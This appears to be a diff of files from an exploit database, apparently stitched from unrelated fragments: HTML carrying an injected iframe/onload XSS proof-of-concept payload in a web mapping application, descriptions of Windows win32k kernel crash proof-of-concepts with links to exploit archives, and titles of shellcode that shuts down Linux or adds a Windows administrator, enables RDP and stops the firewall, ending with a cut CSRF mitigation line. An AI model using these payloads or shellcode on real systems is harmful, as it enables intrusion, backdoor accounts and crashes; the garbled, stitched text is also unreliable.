 this object" href="#NA"><iframe src="a">%20%20%20%20"><iframe src=...</iframe></a></td><td class="fmaps_bakTrHi highlightRow" nowrap="">
 <span style="cursor:default;">Group</span></td><td class="fmaps_bakTrHi highlightRow"><a title="Click to change group membership for this object"
-class="linkLike">Membership</a></td><td style="display: none;" class="indexColumn fmaps_bakTrHi
+class="linkLike">Membership</a></td><td style="display: none;" class="indexColumn fmaps_bakTrHi
 highlightRow"> %20%20%20%20"><iframe src=...groupmembership</td></tr></tbody>
 ...
 <td style="padding-right: 1px; padding-bottom: 1px; padding-left: 1px;" id="fmaps_confBody" valign="top"><div style="height: 19px;"
-id="fmaps_containerTitle" class="titleBar"><span style="float:left" ;="">Settings</span><img title="Map Settings Help"
+id="fmaps_containerTitle" class="titleBar"><span style="float:left" ;="">Settings</span><img title="Map Settings Help"
 src="/images/common/help.png"><select id="fmaps_groupSelect">
 <option class="google" value="1"><iframe src="a">%20%20%20%20"><iframe src=a onload=alert("VL") < (google)
-</iframe></option></select></div><div id="fmaps_confBodyContainer"><div id="defaultsContainer">
+</iframe></option></select></div><div id="fmaps_confBodyContainer"><div id="defaultsContainer">
 ...
-<li class="expandable noWrapOver " groupid="g1"> <div class="hitarea expandable-hitarea "> </div> <img src="/images/common/gicon.png"
+<li class="expandable noWrapOver " groupid="g1"> <div class="hitarea expandable-hitarea "> </div> <img src="/images/common/gicon.png"
-gid="1" title="<iframe src=a>%20%20%20%20"><iframe src="a" onload="alert("VL")" <="" (group="" id:="" 1)"=""></iframe>
+gid="1" title="<iframe src=a>%20%20%20%20"><iframe src="a" onload="alert("VL")" <="" (group="" id:="" 1)"=""></iframe>
 <span id="sdfTreeLoadG" class="" title="<iframe src=a>%20%20%20%20"><iframe src=a onload=alert("VL") < (Group ID: 1)"
 gid="1"><iframe src="a">%20%20%20...</span>
--- a/exploits/windows_x86/dos/38270.txt
+++ b/exploits/windows_x86/dos/38270.txt
@ -1,6 +1,6 @@
 Source: https://code.google.com/p/google-security-research/issues/detail?id=313
-The PoC triggers a pool buffer overflow in win32k!vSolidFillRect. When using Special Pool we get the crash immediately on the overwrite. Without Special Pool we often get a crash in the same function, but sometimes it crashes in a different function (similar to another issue, however with a different offset). This might be a result of the memory corruption or an out-of-memory condition before the overflow is triggered. Debugger output for all three different crashes attached.
+The PoC triggers a pool buffer overflow in win32k!vSolidFillRect. When using Special Pool we get the crash immediately on the overwrite. Without Special Pool we often get a crash in the same function, but sometimes it crashes in a different function (similar to another issue, however with a different offset). This might be a result of the memory corruption or an out-of-memory condition before the overflow is triggered. Debugger output for all three different crashes attached.
 Proof of Concept:
 https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38270.zip
--- a/exploits/windows_x86/dos/38274.txt
+++ b/exploits/windows_x86/dos/38274.txt
@ -13,7 +13,7 @@ please find attached a C trigger, windbg output and the minimised testcase of a
 Quick analysis:
-The trigger creates a new window station which is freed during the process clean up. Through the clipboard operations the window's last reference is hold by the clipboard which is freed during the clean up of the window station object. This will also result in destroying the window object at a time where _gptiCurrent (threadinfo) is already set to null. This is used in xxxDestroyWindow in multiple locations. Depending on the window type it is potentially possible to trigger different kinds of crashes, this one demonstrates a write to a chosen memory location:
+The trigger creates a new window station which is freed during the process clean up. Through the clipboard operations the window's last reference is hold by the clipboard which is freed during the clean up of the window station object. This will also result in destroying the window object at a time where _gptiCurrent (threadinfo) is already set to null. This is used in xxxDestroyWindow in multiple locations. Depending on the window type it is potentially possible to trigger different kinds of crashes, this one demonstrates a write to a chosen memory location:
 win32k!HMChangeOwnerThread+0x40:
 96979765 ff412c          inc     dword ptr [ecx+2Ch]  ds:0023:bebebeea=????????
--- a/exploits/windows_x86/dos/38277.txt
+++ b/exploits/windows_x86/dos/38277.txt
@ -1,7 +1,7 @@
 Source: https://code.google.com/p/google-security-research/issues/detail?id=458
 ---
-The attached testcase crashes Win 7 with Special Pool on win32k while accessing freed memory in bGetRealizedBrush.
+The attached testcase crashes Win 7 with Special Pool on win32k while accessing freed memory in bGetRealizedBrush.
 ---
 Proof of Concept:
--- a/exploits/windows_x86/dos/38278.txt
+++ b/exploits/windows_x86/dos/38278.txt
@ -1,7 +1,7 @@
 Source: https://code.google.com/p/google-security-research/issues/detail?id=457
 ---
-The attached testcase crashes Win 7 with Special Pool enabled while accessing the freed global cursor object (_gpqCursor). See poc.cpp for instructions on how to compile and run.
+The attached testcase crashes Win 7 with Special Pool enabled while accessing the freed global cursor object (_gpqCursor). See poc.cpp for instructions on how to compile and run.
 Proof of Concept:
 https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38278.zip
--- a/exploits/windows_x86/dos/38307.txt
+++ b/exploits/windows_x86/dos/38307.txt
@ -1,7 +1,7 @@
 Source: https://code.google.com/p/google-security-research/issues/detail?id=474
 ---
-The attached PoC triggers a buffer overflow in the NtGdiBitBlt system call. It reproduces reliable on Win 7 32-bit with Special Pool enabled on win32k.sys
+The attached PoC triggers a buffer overflow in the NtGdiBitBlt system call. It reproduces reliable on Win 7 32-bit with Special Pool enabled on win32k.sys
 ---
 Proof of Concept:
--- a/shellcodes/linux_x86/37289.txt
+++ b/shellcodes/linux_x86/37289.txt
@ -1,4 +1,4 @@
-Linux/x86 - Shutdown(init 0) - 30 bytes
+Linux/x86 - Shutdown(init 0) - 30 bytes
 #Greetz : Bomberman(Leader)
 #Author : B3mB4m
--- a/shellcodes/windows_x86-64/35794.txt
+++ b/shellcodes/windows_x86-64/35794.txt
@ -1,5 +1,5 @@
 #Author: Ali Razmjoo
- #Title: Obfuscated Shellcode Windows x64 [1218 Bytes] [Add Administrator User/Pass ALI/ALI & Add ALI to RDP Group & Enable RDP From Registery & STOP Firewall & Auto Start terminal service]
+ #Title: Obfuscated Shellcode Windows x64 [1218 Bytes] [Add Administrator User/Pass ALI/ALI & Add ALI to RDP Group & Enable RDP From Registery & STOP Firewall & Auto Start terminal service]
 Obfuscated Shellcode Windows x64 [1218 Bytes].c
--- a/shellcodes/windows_x86/35793.txt
+++ b/shellcodes/windows_x86/35793.txt
@ -1,5 +1,5 @@
 #Author: Ali Razmjoo
-#Title: Obfuscated Shellcode Windows x86 [1218 Bytes] [Add Administrator User/Pass ALI/ALI & Add ALI to RDP Group & Enable RDP From Registery & STOP Firewall & Auto Start terminal service]
+#Title: Obfuscated Shellcode Windows x86 [1218 Bytes] [Add Administrator User/Pass ALI/ALI & Add ALI to RDP Group & Enable RDP From Registery & STOP Firewall & Auto Start terminal service]
 Obfuscated Shellcode Windows x86 [1218 Bytes].c
`@ -37,4 +37,4 @@ Exploit code:`

	`3. Solution:`	`3. Solution:`

	`To Mitigate CSRF vulnerability, it is recommeded to enforce security tokens such as anti csrf tokens`	`To Mitigate CSRF vulnerability, it is recommeded to enforce security tokens such as anti csrf tokens`